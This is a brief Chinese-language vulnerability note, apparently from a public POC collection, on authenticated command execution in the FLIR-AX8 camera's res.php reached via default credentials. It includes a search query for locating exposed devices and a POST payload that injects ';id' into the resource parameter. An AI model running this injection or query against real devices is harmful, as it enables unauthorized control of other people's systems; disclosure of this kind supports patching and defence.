# FLIR-AX8 res.php 后台命令执行漏洞 ## 漏洞描述 FLIR-AX8 res.php 文件存在后台命令执行漏洞,攻击者通过默认口令登录后台后获取服务器权限 ## 漏洞影响 ``` FLIR-AX8 ``` ## 网络测绘 ``` app="FLIR-FLIR-AX8" ``` ## 漏洞复现 登录页面 ![image-20220913103521047](images/202209131036578.png) 出现漏洞的文件为 **res.php** ``` ``` 验证POC ``` POST /res.php action=node&resource=;id ``` ![](images/202209131037844.png)